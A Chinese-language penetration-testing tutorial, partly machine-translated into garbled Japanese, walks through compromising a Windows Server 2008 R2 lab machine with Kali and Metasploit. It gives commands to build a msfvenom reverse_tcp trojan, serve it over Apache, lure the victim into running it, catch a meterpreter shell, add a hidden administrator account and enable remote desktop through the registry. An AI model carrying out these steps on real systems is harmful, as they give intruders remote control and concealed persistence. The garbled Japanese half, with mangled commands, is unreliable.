、カーリーとMetasploitの
カリ侵入テストツールの多くを統合デジタルフォレンジックベースのシステム、のDebin、その前身はBT5 R3(BrackTrack)であり、情報収集に重要な役割を果たしています。
Metasploitのは、非常に攻撃者の侵入の効率を向上させ、ツールの利用であり、Rubyの開発者を使用して、ツールに道を非常に使いやすい:端末入力msfconsole、MSFは、データベースを開くためにMSFを使用する前に、PostgreSQLデータベースに依存しています
第二に、Metasploitのカリの使用はトロイの木馬、Windowsのコントロールシステムを生成します
攻撃者:カーリー2019.3
ドローン:のWindows Server 2008 R2
まず、2つのシステム間でお互いにpingを実行できることを確認します
2.生産トロイの木馬、攻撃者の端末操作
1 msfvenom -p窓/ meterpreter / reverse_tcp lhost =カーリーのIP lportは= 5555 -f EXE> /root/Desktop/evilshell.exe 2 -pパラメータの後にペイロード(キャリア)に追いつくためにした後、攻撃が成功すると、何もやる 3 lhostをIPリスニング続く リスニングポートに続く4 lportは 、バックドアが続くタイプ5 -fをファイルを生成します
- あなたは中国のカーリーをインストールする場合は、デスクトップのデスクトップに置きます
/ var / www / htmlと設定にコピー3.トロイの木馬ファイルevilshell.exe、htmlディレクトリ内のファイルの残りの部分を削除し、Apacheサービス開きます(これはトロイの木馬のファイルを提供することを目的とし、プラットフォームをダウンロードすることができます)
1つのCP evilshell.exeの/ var / www /ののhtml ファイルのコピーは、トロイの木馬 2のrm -f index.htmlを削除したindex.html 。3 RM-debian.html -f insex.nginxのindex.htmlを削除します
4.サイトにアクセスするためのドローンブラウザをオンにします。http://カーリーのIPを、およびトロイの木馬のファイルをダウンロードし、私はあなたのデスクトップにダウンロードした、操作しやすいです
5.オープンサービスPostgreSQLは、PostgreSQLのポート番号が5432、上の(略語msfconsole)MSFであります
サービスのPostgreSQLの状態を表示するには、1つの/etc/init.d/postgresqlステータス 2は、PostgreSQLサービスを開くために開始/etc/init.d/postgresql 3 netstatの-ntulpビューポート
4 msfconsoleオープンMSFを
- Metasploitのv5.0.41-devのバージョン
- などの特定のサービス、プラットフォーム、システム、のために使用され搾取、攻撃ツールを利用
- ペイロードは、攻撃が成功した操作のペイロードによって運営されたものの後に負荷キャリアを攻撃します
6.ロードエクスプロイトとペイロード、モジュールパラメータを設定する参照
1 msf5>使用エクスプロイト/マルチ/ハンドラの選択が悪用 2 msf5は(マルチ/ハンドラ)> SETペイロードのWindows / Meterpreter / reverse_tcp提供ペイロードを利用する 。必要な3つのビューの表示オプションの設定パラメータ
- 注意:ここでのパスは、トロイの木馬ペイロードを生成するために上記と一致しています
7.根据上图的需求设置lhost和lport,这里的lhost和lport要和上面生产木马的命令中的lhost和lport一致
1 set lhost kali的IP 设置监听地址 2 set lport 5555 设置监听端口 3 run 或者exploit 运行攻击模块
8.在靶机中双击evilshell.exe(这一步是在靶机中诱导用户点击木马程序,也叫社会工程学攻击),这样在攻击者这里就可以得到靶机的shell(meterpreter)
1 shell 获取目标主机shell 2 ifconfig 测试是否能用
- windows环境下中文乱码的解决办法:chcp 437
9.在靶机里加入一个隐藏用户(隐藏用户后面加$),提升隐藏用户的权限,方便我们后续的操作测试
1 net user host$ /add 添加隐藏用户host$ 2 net user 查看用户 3 net user host$ 密码 为host$用户设置密码 4 net localgroup administrators host$ /add 将host$用户加入到管理员组中,从而提升权限 5 net user host$ 查看host$用户信息
10.新开一个终端,使用远程桌面连接的靶机,进行操作
rdesktop 靶机的IP 使用远程桌面连接靶机
- 如上图所示,连接失败
解决方法:
方法1:打开上一个终端,开启2003终端服务,查看远程协助的端口是否开启
1 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 开启终端服务 2 netstat -ano|finder 3389 查看3389端口
方法2:打开控制面版-->系统-->远程设置,操作如图所示
- 重新连接靶机,连接成功,进入以下界面,是用隐藏用户登录靶机
11.打开靶机的dos命令窗口,若无法在开始中找到dos命令窗口,则按键盘上的开始键+R,在打开的运行中输入cmd,即开启dos命令窗口,添加一个新用户进行测试,添加成功证明渗透成功!
- 如图所示,拒绝访问
解决方法:在路径中C:\Windows\system32查找cmd.exe,右键cmd.exe,选择以管理员身份运行